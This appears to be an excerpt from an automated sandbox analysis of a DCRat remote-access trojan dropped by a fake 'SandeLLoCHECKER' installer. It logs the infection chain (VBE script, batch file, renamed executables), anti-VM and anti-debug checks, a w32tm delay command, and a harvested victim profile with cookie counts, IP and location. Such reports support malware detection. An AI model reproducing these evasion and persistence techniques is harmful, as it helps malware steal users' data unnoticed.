                                    Source: SandeLLoCHECKER_Installer.msi.3.drBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
                                    Source: wscript.exe, 00000002.00000003.1774330336.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704675568.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704434925.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704434925.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: webDriverintoDll.exe, 0000000B.00000002.1887165199.000000001BB7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: w32tm.exe, 00000020.00000002.1894107714.000001FB1BCC7000.00000004.00000020.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2895305392.000000000119B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-24968
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004AF838
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009946B0 GetLocalTime,CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,3_2_009946B0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0084F620 RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,FreeLibrary,3_2_0084F620
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004B7DEE mov eax, dword ptr fs:[00000030h]1_2_004B7DEE
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A3008B mov eax, dword ptr fs:[00000030h]3_2_00A3008B
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A300CF mov eax, dword ptr fs:[00000030h]3_2_00A300CF
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A2158A mov ecx, dword ptr fs:[00000030h]3_2_00A2158A
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A158D7 mov esi, dword ptr fs:[00000030h]3_2_00A158D7
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004BC030 GetProcessHeap,1_2_004BC030
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004AF838
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF9D5 SetUnhandledExceptionFilter,1_2_004AF9D5
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004AFBCA
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004B8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004B8EBD
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0087BBA0 __set_se_translator,SetUnhandledExceptionFilter,3_2_0087BBA0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A16466 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A16466
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0087E600 __set_se_translator,SetUnhandledExceptionFilter,3_2_0087E600
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A1B023 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A1B023
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeProcess created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"Jump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i c:\users\user\appdata\local\temp\{f123046a-2cbf-4743-a59b-e3d2751b5780}\51b5780\sandellochecker_installer.msi ai_setupexepath=c:\users\user\appdata\local\temp\sandellochecker_installer.exe setupexedir=c:\users\user\appdata\local\temp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733667848 " ai_found_prereqs=".net framework 4.8 (web installer)"
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i c:\users\user\appdata\local\temp\{f123046a-2cbf-4743-a59b-e3d2751b5780}\51b5780\sandellochecker_installer.msi ai_setupexepath=c:\users\user\appdata\local\temp\sandellochecker_installer.exe setupexedir=c:\users\user\appdata\local\temp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733667848 " ai_found_prereqs=".net framework 4.8 (web installer)"Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0095BF10 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,3_2_0095BF10
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .4",5,1,"","user","562258","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\reference assemblies\\Microsoft","_SL8D (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.22
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","562258","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\reference assemblies\\Microsoft","_SL8D (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF654 cpuid 1_2_004AF654
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_004AAF0F
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,3_2_0098A660
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeQueries volume information: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe VolumeInformationJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
